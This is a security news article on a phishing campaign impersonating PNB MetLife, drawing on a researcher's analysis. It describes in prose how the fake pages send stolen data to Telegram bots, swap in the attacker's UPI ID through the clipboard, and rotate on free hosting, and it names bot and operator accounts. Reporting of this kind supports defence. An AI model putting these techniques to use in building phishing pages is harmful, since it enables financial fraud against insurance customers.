Smishing Alert: Telegram Bots Power New PNB MetLife Phishing Campaign

A new, highly aggressive phishing campaign has been uncovered targeting policyholders of PNB MetLife Insurance, blending mobile-first design with stealthy data exfiltration tactics. Security researcher Anurag Gawande has detailed a sprawling operation where scammers are impersonating the trusted insurer to harvest sensitive personal data, banking credentials, and facilitate fraudulent UPI payments.

The campaign is notable not just for its visual fidelity but for its backend mechanics, which completely bypass traditional command-and-control (C2) servers in favor of the Telegram Bot API for real-time data theft.

The attack likely begins with a “smishing” (SMS phishing) lure, directing victims to fraudulent payment gateways optimized specifically for smartphones.

“The pages are optimized for mobile devices, both in layout and interaction design,” the report notes. “This strongly suggests that victims are likely being lured via SMS messages, although delivery via email, social media platforms, or messaging apps cannot be ruled out”.

The landing pages are designed to lower inhibitions by exploiting brand familiarity. “This activity highlights how scammers deliberately target reputed and widely trusted brands to exploit existing customer trust and increase the likelihood of successful financial fraud”.

However, the facade is thin. Technical analysis reveals that the sites perform zero validation on user input. “Any arbitrary values are accepted, and the user is allowed to proceed to the next step without verification,” exposing the site’s sole purpose: harvesting data, not processing legitimate premiums.

Instead of storing stolen data on a compromised server, the attackers are using Telegram bots as a live feed of victim information. Hardcoded directly into the malicious JavaScript are tokens for bots such as pnbmetlifesbot and goldenxspy_bot.

“Instead of communicating with a legitimate payment backend, the page sends captured information directly to Telegram, where it can be monitored in real time by the attacker”.

The report identifies specific operator accounts, including darkdevil_pnb and prabhatspy, receiving the stolen data streams.

One of the most devious techniques identified in the report is the manipulation of the victim’s device clipboard to force payments to the attacker.

After a victim enters a fake premium amount, the site generates a UPI QR code. Crucially, the site also includes buttons for popular apps like PhonePe and Paytm. “Clicking these buttons triggers JavaScript that silently copies the attacker controlled UPI ID to the clipboard and then redirects the victim to a payment app deep link”.

This ensures that even if the QR code scan fails, the victim is primed to paste the attacker’s VPA (Virtual Payment Address) into their payment app, unknowingly sending funds to the fraudsters.

While the primary template focuses on immediate payment fraud, a second, more dangerous variant was observed. This version lures victims with promises of “Refunds” or “AutoDebit” setups to steal complete banking profiles.

“This second template follows a slightly different flow and is significantly more dangerous, as it escalates from payment fraud to full banking and card data theft”.

Victims are presented with a “Bank Details for Verification” page, where their account numbers and card details are captured and immediately beamed to the attackers via the goldenxspy_bot.

The campaign is built for speed and resilience. The phishing pages are hosted on EdgeOne Pages, a free hosting provider, allowing the attackers to spin up new sites instantly if one is taken down.

“This allows attackers to deploy and rotate phishing pages rapidly with minimal effort,” the report concludes, noting that while the URLs change, the underlying malicious logic remains identical.

Related Posts:

• Phishing Scam Alert: McAfee Uncovers a New Android Campaign Impersonating a Government Solar Program
• Chinese Fraudsters Target India’s UPI: The Rise of Counterfeit Loan Apps
• Clipboard security issues found in Chromium, Firefox, and Apple Safari browsers